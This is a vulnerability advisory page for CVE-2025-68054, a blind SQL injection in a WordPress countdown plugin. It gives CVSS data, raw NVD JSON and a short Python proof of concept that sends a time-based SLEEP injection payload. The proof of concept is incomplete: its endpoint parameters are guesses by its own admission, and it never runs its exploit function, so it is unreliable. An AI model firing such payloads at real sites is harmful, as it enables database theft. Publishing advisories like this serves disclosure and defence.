Security Vulnerability Report
中文
CVE-2025-68054 CVSS 8.5 HIGH

CVE-2025-68054

Published: 2025-12-16 09:16:01
Last Modified: 2026-04-27 19:16:24

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup CountDown With Image or Video Background countdown_with_background allows Blind SQL Injection.This issue affects CountDown With Image or Video Background: from n/a through <= 1.5.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

CountDown With Image or Video Background <= 1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68054 PoC - Blind SQL Injection # Target: WordPress CountDown With Image or Video Background plugin <= 1.5 target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # SQL Injection payload for blind extraction # This example checks if the first character of user() is 'r' payload = "1' AND (SELECT CASE WHEN (SUBSTRING((SELECT user()),1,1)='r') THEN SLEEP(5) ELSE 0 END)-- - # The actual PoC would iterate through database content # Example: Extract database version, user, table names etc. def exploit_sqli(url, payload): headers = { 'Content-Type': 'application/x-www-form-urlencoded', } data = { 'countdown_id': payload, 'action': 'get_countdown' } try: response = requests.post(url, headers=headers, data=data, timeout=30) return response.elapsed.total_seconds() > 5 except: return False print('[*] CVE-2025-68054 Blind SQL Injection PoC') print('[*] Target:', target) print('[*] Testing SQL Injection...') # Note: This is a simplified PoC for demonstration # Actual exploitation requires identifying the vulnerable endpoint

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68054", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:01.060", "lastModified": "2026-04-27T19:16:23.553", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup CountDown With Image or Video Background countdown_with_background allows Blind SQL Injection.This issue affects CountDown With Image or Video Background: from n/a through <= 1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/countdown_with_background/vulnerability/wordpress-countdown-with-image-or-video-background-plugin-1-5-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}